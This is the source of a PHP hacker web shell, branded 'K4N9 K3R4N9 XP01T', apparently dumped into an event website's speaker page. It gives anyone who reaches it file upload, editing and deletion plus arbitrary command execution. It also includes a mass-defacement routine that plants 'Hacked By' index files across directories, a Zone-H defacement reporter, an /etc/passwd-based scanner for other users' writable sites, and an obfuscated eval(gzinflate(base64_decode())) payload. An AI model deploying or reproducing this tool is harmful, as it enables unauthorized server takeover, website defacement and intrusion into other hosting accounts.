Arthur Marthur

$value){
$_POST[$key] = stripslashes($value);
}
}
echo ‘

[ ./K4N9 K3R4N9 XP01T ]

body{
font-family:Supermercado One, sans-serif;
background-color: #000022;
background-image: url();
background-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;
color: white;
}
#content tr:hover{
background-color: black;
text-shadow:0px 0px 10px black;
}
#content .first{
background-color: white;
}
table{
border: 1px #000000 dotted;
}
a{
color: #00FF66;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.lazy {
margin: 0;
font-family:Supermercado One;
}

[ ./K4N9 K3R4N9 XP01T ]

Path : ‘;
if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
}else{
$path = getcwd();
}
$path = str_replace(‘\\’,’/’,$path);
$paths = explode(‘/’,$path);

foreach($paths as $id=>$pat){
if($pat == ” && $id == 0){
$a = true;
echo ‘/‘;
continue;
}
if($pat == ”) continue;
echo ‘<a href="?path=';
for($i=0;$i'.$pat.'/’;
}
echo ”;
if(isset($_FILES[‘file’])){
if(copy($_FILES[‘file’][‘tmp_name’],$path.’/’.$_FILES[‘file’][‘name’])){
echo ‘ UPLOAD SUCCEST ‘;
}else{
echo ‘ UPLOAD FAILED! ‘;
}
}
if(isset($_GET[‘dir’])) {
$dir = $_GET[‘dir’];
chdir($dir);
} else {
$dir = getcwd();
}
$ip = gethostbyname($_SERVER[‘HTTP_HOST’]);
$kernel = php_uname();
$ds = @ini_get(“disable_functions”);
$show_ds = (!empty($ds)) ? “$ds” : “CLEAR BRO!”;
if(!function_exists(‘posix_getegid’)) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = “?”;
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid[‘name’];
$uid = $uid[‘uid’];
$group = $gid[‘name’];
$gid = $gid[‘gid’];
}
echo “Disable Functions : $show_ds”;
echo “System : <font color=aqua".$kernel."";
echo "";
echo "";
echo "[ Home ]”;
echo “[ Zone-H ]”;
echo “[ Jumping ]”;
echo “[ Symlink ]”;
echo “[ Mass Depes ]”;
echo “[ Command ]”;
echo “”;
echo “”;
if($_GET[‘to’] == ‘zoneh’) {
if($_POST[‘submit’]) {
$domain = explode(“\r\n”, $_POST[‘url’]);
$nick = $_POST[‘nick’];
echo “Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0“;
echo “Defacer Archive: http://www.zone-h.org/archive/notifier=$nick“;
function zoneh($url,$nick) {
$ch = curl_init(“http://www.zone-h.com/notify/single”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, “defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send”);
return curl_exec($ch);
curl_close($ch);
}
foreach($domain as $url) {
$zoneh = zoneh($url,$nick);
if(preg_match(“/color=\”red\”>OK!/i”, $zoneh)) {
echo “$url -> OK!”;
} else {
echo “$url -> ERROR!”;
}
}
} else {
echo ”
Defacer:

Domains:

“;
}
echo “”;
} elseif($_GET[‘to’] == ‘mass’) {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “[DONE] $lokasi”;
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “[DONE] $dirb/$namafile”;
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST[‘start’]) {
if($_POST[‘tipe_sabun’] == ‘mahal’) {
echo “”;
sabun_massal($_POST[‘d_dir’], $_POST[‘d_file’], $_POST[‘script’]);
echo “”;
} elseif($_POST[‘tipe_sabun’] == ‘murah’) {
echo “”;
sabun_biasa($_POST[‘d_dir’], $_POST[‘d_file’], $_POST[‘script’]);
echo “”;
}
} else {
echo “”;
echo ”
Tipe Mass:
BiasaMassal
Folder:

Filename:

Index File:
Hacked By ./Branz_Mafia

“;
}
}elseif($_GET[‘to’] == ‘sym’) {
echo ”;
eval(gzinflate(base64_decode(‘7Vf/T9tGFP89Uv6H1yOT7ZHaSRBrReKUrjCt0lakAtskqCLHPmOPi8+6u2BSyv++d+fYpE4AlVbaJhWJyHnf/b583ksnnjMGPkglJoLmLAip3ZkcH77/4/D9mXVw9Ob098N3J5P3R0cn1ocuENKFTh6oxBm2W52oNwvSTKL6fpwyahOPqtDLghmN3JBnMdFSW1uJUmhWtltpbFc6zk27tT+7jFJhk4iGwWIiFzPS7b148UIr7YdJg2Wo9JqGNmEZPJfggeBcGXpHe9/BMKyjXKUcI3qbRSgr4RfOGC+OF7Pf0uwSIzhIBQ0VFwsjAMa8m6hZu/U6ik4WOQVFr5WHeUgzcPMkB8P5NcgiRkWT2W4dByqV8QJeZwvLBJLrMGKe08y20HAQ4otLq2sVVhloYfiFSBXmGaW7ZezOcD8OGZclUYvSMOFA2q2RCqaMQsDSi8wPaaYwjCkXERX+DlZtwahvFWmkkr2fej8MS87zkDMu9rZe/tzDv6E11maE+Yw+szQexTxTYMR9ls4oyPQj9QfjYxfecXfkafZ45KnoS5QPuCnxE7VPJRVP1cVCMyx0Q9vDdyemX0M+Rz0f+vgt5oIGYVJ3JAQSls+6ObFXqaAXqU0+8oySbsVybnIkT2aBCpNJwJhtbWkBILb7o0O2rG5lRD+UidDljNlcJrZ+QsM4bAwbRIl0ZldCZ/0PZ70PjgNjGGj/nTnmAUPNuUyvJxdU5cU8jWwzaLzIqFhO2xUmJpBUesRtmqq7CIvfyB8mpszhMnEEXKjS46LCPelnNEZqAImgsY9jne95XlEUbtO3S7yqRiyQ0lfXarwuU3sJVjxpOf3qZ5bGEcuI1bzKtdXRsOXV6OBpKPASPqPemrqXz6csDSc45cwCFQjMpW9NpizILq21KJsdtAxt2UOwWshlvra3h7e3t3WqPTOvpt9uKZNUl/Lk8PjELyHSMkXL0V0RWWU7gG0EnoSI/3VAhMcQER6AROQ2UREqWIQHcLE/LtEO7sEN0/M7GzHuEZUN2PSYk3VEqvEIPgckMO9dJ4usdApuXSKIA1wAvU6VTU4z8/aKg5YFrfjMVB6KRLfZs5hyXLaa7ujGgo7e0jG2vlxSjUODYlSzAiGChV1SdUB3IIcte+4huL1yzvfOPU9qhJPdWrdpaPWQIOVEdvFqqCRw9o3GHQrWhhD5+gP49AnWGL4PPc24c+MDmaYZWSPqlP3V73uxXOddBcJj6dTL7mMGIi80aTP3gucJFes8uTEQYy+arTPmEk0hNN0TQ6zyzW+VbWJoDcTfzQxzhxEHk423mEqzOb0bID0gDzXuho3wYLevwLzWq0KpFMmq50cMVBj/AMQ3XKwi/BrA1wMY3DN9Gr9rlKkmownmJZTr+5VLeIYJ/jPNIl5I4tzci9mbEFtfsGt4fYfW6PkLAbvXe/kNoLrd+mqwfgCpq0Ing2WZrcsBYzs70aAuDxxTcUXFyEsG428C7m8P/lVgV3SWY6IIGXbwQOvjY888DTTW65schfAAtZfskQ+GW37d3nbgpoPXnv5h1bj/jMASQfFwQJJTOnN9+JunWLY9q2vILjnPsHGrSlijqfDG1rAKrTw+9ZdlA+4i0URllo+iUrk4jgjeRblY4nxeLY/d7lJRk1dGZxdNray0ap9tsvpV+2x9mX2bTfZ9jX1fY//nNdYYxw2bbORF6RV+LoMmw3mmza5MplG6Bb3v4E59EwK+CbKM4yvjz2hFoYmHtQdtrvx/Nf4H’)));
} elseif($_GET[‘to’] == ‘jumping’) {
$i = 0;
echo “”;
if(preg_match(“/hsphere/”, $dir)) {
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo “”;
foreach($urls as $url) {
$url = str_replace(array(“http://”,”www.”), “”, strtolower($url));
$etc = “/etc/passwd”;
$f = fopen($etc,”r”);
while($gets = fgets($f)) {
$pecah = explode(“:”, $gets);
$user = $pecah[0];
$dir_user = “/hsphere/local/home/$user”;
if(is_dir($dir_user) === true) {
$url_user = $dir_user.”/”.$url;
if(is_readable($url_user)) {
$i++;
$jrw = “[R] $url_user“;
if(is_writable($url_user)) {
$jrw = “[RW] $url_user“;
}
echo $jrw.””;
}
}
}
}
if($i == 0) {
} else {
echo “Total ada “.$i.” Kamar di “.$ip;
}
echo “”;
} else {
echo ‘

List Domains:
‘;
$fp = fopen(“/hsphere/local/config/httpd/sites/sites.txt”,”r”);
while($getss = fgets($fp)) {
echo $getss;
}
echo ‘

‘;
}
} elseif(preg_match(“/vhosts|vhost/”, $dir)) {
preg_match(“/\/var\/www\/(.*?)\//”, $dir, $vh);
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo “”;
foreach($urls as $url) {
$url = str_replace(“www.”, “”, $url);
$web_vh = “/var/www/”.$vh[1].”/$url/httpdocs”;
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
$jrw = “[R] $web_vh“;
if(is_writable($web_vh)) {
$jrw = “[RW] $web_vh“;
}
echo $jrw.””;
}
}
}
if($i == 0) {
} else {
echo “Total ada “.$i.” Kamar di “.$ip;
}
echo “”;
} else {
echo ‘

List Domains:
‘;
bing(“ip:$ip”);
echo ‘

‘;
}
} else {
echo “”;
$etc = fopen(“/etc/passwd”, “r”) or die(“Can’t read /etc/passwd”);
while($passwd = fgets($etc)) {
if($passwd == ” || !$etc) {
echo “Can’t read /etc/passwd”;
} else {
preg_match_all(‘/(.*?):x:/’, $passwd, $user_jumping);
foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = “/home/$user_idx_jump/public_html”;
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = “[R] $user_jumping_dir“;
if(is_writable($user_jumping_dir)) {
$jrw = “[RW] $user_jumping_dir“;
}
echo $jrw;
if(function_exists(‘posix_getpwuid’)) {
$domain_jump = file_get_contents(“/etc/named.conf”);
if($domain_jump == ”) {
echo ” => ( gabisa ambil nama domain nya )”;
} else {
preg_match_all(“#/var/named/(.*?).db#”, $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner(“/etc/valiases/$dj”));
$user_jumping_url = $user_jumping_url[‘name’];
if($user_jumping_url == $user_idx_jump) {
echo ” => ( $dj )”;
break;
}
}
}
} else {
echo “”;
}
}
}
}
}
if($i == 0) {
} else {
echo “Total ada “.$i.” Kamar di “.$ip;
}
echo “”;
}
echo “”;
} elseif($_GET[‘to’] == ‘cmd’) {
echo ”
“.$user.”@”.$ip.”: ~ $
>’>
“;
if($_POST[‘do_cmd’]) {
echo “”.exe($_POST[‘cmd’]).””;
}
}
echo ‘
File Upload :

‘;
if(isset($_GET[‘filesrc’])){
echo “Current File : “;
echo $_GET[‘filesrc’];
echo ”;
echo(”.htmlspecialchars(file_get_contents($_GET[‘filesrc’])).”);
}elseif(isset($_GET[‘option’]) && $_POST[‘opt’] != ‘delete’){
echo ”.$_POST[‘path’].”;
if($_POST[‘opt’] == ‘chmod’){
if(isset($_POST[‘perm’])){
if(chmod($_POST[‘path’],$_POST[‘perm’])){
echo ‘Change Permission Succest’;
}else{
echo ‘Change Permission Failed’;
}
}
echo ‘
Permission :

‘;
}elseif($_POST[‘opt’] == ‘rename’){
if(isset($_POST[‘newname’])){
if(rename($_POST[‘path’],$path.’/’.$_POST[‘newname’])){
echo ‘Rename Succest’;
}else{
echo ‘Rename Failed!’;
}
$_POST[‘name’] = $_POST[‘newname’];
}
echo ‘
Nama Baru :

‘;
}elseif($_POST[‘opt’] == ‘edit’){
if(isset($_POST[‘src’])){
$fp = fopen($_POST[‘path’],’w’);
if(fwrite($fp,$_POST[‘src’])){
echo ‘Edit Succest’;
}else{
echo ‘Edit Failed’;
}
fclose($fp);
}
echo ‘
‘.htmlspecialchars(file_get_contents($_POST[‘path’])).’

‘;
}
echo ”;
}else{
echo ”;
if(isset($_GET[‘option’]) && $_POST[‘opt’] == ‘delete’){
if($_POST[‘type’] == ‘dir’){
if(rmdir($_POST[‘path’])){
echo ‘Directory Deleted’;
}else{
echo ‘Directory Delete Failed! ‘;
}
}elseif($_POST[‘type’] == ‘file’){
if(unlink($_POST[‘path’])){
echo ‘Delete Succest;)’;
}else{
echo ‘Delete Failed!’;
}
}
}
echo ”;
$scandir = scandir($path);
echo ‘

Name
Size
Permission
Modify
‘;

foreach($scandir as $dir){
if(!is_dir($path.’/’.$dir) || $dir == ‘.’ || $dir == ‘..’) continue;
echo ‘
‘.$dir.’

‘;
if(is_writable($path.’/’.$dir)) echo ”;
elseif(!is_readable($path.’/’.$dir)) echo ”;
echo perms($path.’/’.$dir);
if(is_writable($path.’/’.$dir) || !is_readable($path.’/’.$dir)) echo ”;

echo ‘

Select
Delete
Chmod
Rename

“>

‘;
}
echo ”;
foreach($scandir as $file){
if(!is_file($path.’/’.$file)) continue;
$size = filesize($path.’/’.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).’ MB’;
}else{
$size = $size.’ KB’;
}

echo ‘
‘.$file.’
‘.$size.’
‘;
if(is_writable($path.’/’.$file)) echo ”;
elseif(!is_readable($path.’/’.$file)) echo ”;
echo perms($path.’/’.$file);
if(is_writable($path.’/’.$file) || !is_readable($path.’/’.$file)) echo ”;
echo ‘

Pilih
Delete
Chmod
Rename
Edit

“>

‘;
}
echo ‘
‘;
}
echo ‘ | Powered By [ INDONESIAN HACKERS RULES ]

‘;
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = ‘s’;
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = ‘l’;
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = ‘-‘;
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = ‘b’;
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = ‘d’;
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = ‘c’;
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = ‘p’;
} else {
// Unknown
$info = ‘u’;
}

// Owner
$info .= (($perms & 0x0100) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0080) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? ‘s’ : ‘x’ ) :
(($perms & 0x0800) ? ‘S’ : ‘-‘));

// Group
$info .= (($perms & 0x0020) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0010) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? ‘s’ : ‘x’ ) :
(($perms & 0x0400) ? ‘S’ : ‘-‘));

// World
$info .= (($perms & 0x0004) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0002) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? ‘t’ : ‘x’ ) :
(($perms & 0x0200) ? ‘T’ : ‘-‘));

return $info;
}
?>

Events by this speaker

September

Di01SepAll DaySa31OktOnline Olarak YapılacakTest Event Amit(All Day) Organizator: Ataro BV Be the first to RSVPSpaces Still available

Oktober

Di01SepAll DaySa31OktOnline Olarak YapılacakTest Event Amit(All Day) Organizator: Ataro BV Be the first to RSVPSpaces Still available

X
X
X
X
X
X
X